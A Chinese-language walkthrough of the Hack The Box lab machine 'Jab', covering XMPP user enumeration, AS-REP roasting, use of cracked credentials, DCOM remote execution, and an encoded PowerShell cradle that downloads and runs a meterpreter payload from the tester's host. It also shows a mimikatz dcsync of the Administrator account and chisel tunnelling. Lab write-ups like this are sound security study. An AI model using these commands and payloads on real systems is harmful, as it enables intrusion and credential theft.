HTB-Jab

扫描端口服务利用

XMPP - 5269, 5270(tcp

下载客户端

XMPP 是一个“通用消息标准”。它允许“XMPP 兼容的软件加入 XMPP 消息网络”

image-20250517223432755

先创建,新建一个用户,使用,在利用插件Service Discovery 来进行那个信息收集

可以看到还有三个子域名

然后点击list的用户的查找用户这,顺便开启插件控制台

1
2
3
4
5
6
7
8
9
<iq type='set' 
    from='ddl1@jab.htb'
    to='search.jab.htb'
    id='search4users'
    xml:lang='en'>
	<query xmlns='jabber:iq:search'>
        <last>*</last>
	</query>
</iq>

然后会列出所有查询,之后写脚本提取

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import re

# 文件路径(输入和输出)
input_file = '2.txt'
output_file = '3.txt'

# 读取文件内容
with open(input_file, 'r', encoding='utf-8') as f:
    content = f.read()

# 提取用户名
usernames = re.findall(r"jid='(.*?)@jab\.htb'", content)

# 写入到文件 3.txt
with open(output_file, 'w', encoding='utf-8') as f:
    for user in usernames:
        f.write(user + '\n')

print(f"提取完成,共 {len(usernames)} 个用户名,已保存到 {output_file}")

成为字典后开始检查

不需要预身份验证的账户

1
impacket-GetNPUsers jab.htb/ -dc-ip dc01.jab.htb -usersfile 3.txt -outputfile 4.txt -format hashcat

然后john一下

枚举的时候获得

1
netexec smb jab.htb -u jmontgomery -p 'Midnight_121'

然后用新凭证收集信息

image-20250517231445131

image-20250517231557902

下边有hash,结尾是密码

1
netexec smb jab.htb -u svc_openfire -p '!@#$%^&*(1qazxsw'

winrm不好使

利用凭证bloodhound

image-20250518204736911

ExecuteDCOM

测试

开启监听
1
tcpdump -ni tun0 icmp
  • -n
    • 不进行主机名/IP 的反解析(提高速度,直接显示 IP 地址)
  • -i tun0
    • 指定网卡
发包
1
impacket-dcomexec jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.11.4 'ping 10.10.16.14' -silentcommand -object MMC20
利用
1
2
3
4
5
use exploit/multi/script/web_delivery
set target 2      // PowerShell
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
run

然后生成的码放在

1
impacket-dcomexec jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.11.4 'powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB2ADYAbwBRAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAHYANgBvAFEALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJAB2ADYAbwBRAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA2AC4AMQA0ADoAOAAwADgAMQAvAGgAcABpAGIAawBqAGEAcQBSAC8AaAB6AFkATQBRAEUAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADEANAA6ADgAMAA4ADEALwBoAHAAaQBiAGsAagBhAHEAUgAnACkAKQA7AA==' -silentcommand -object MMC20
1
lsadump::dcsync /domain:jab.local /user:Administrator

提权

查看进程

image-20250518210836255

查看端口

image-20250518211045264

1
./chisel_1.10.1_windows_amd64 client 10.10.16.14:8050 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091

拿管理员身份登录账户

上传恶意插件

在“服务器” –> “服务器设置”中现在有一个“管理工具”选项:

我将按照 GitHub 上的说明输入“123”。该插件有一个选项下拉菜单:

Openfire - 7070, 7443 (tcp)

参考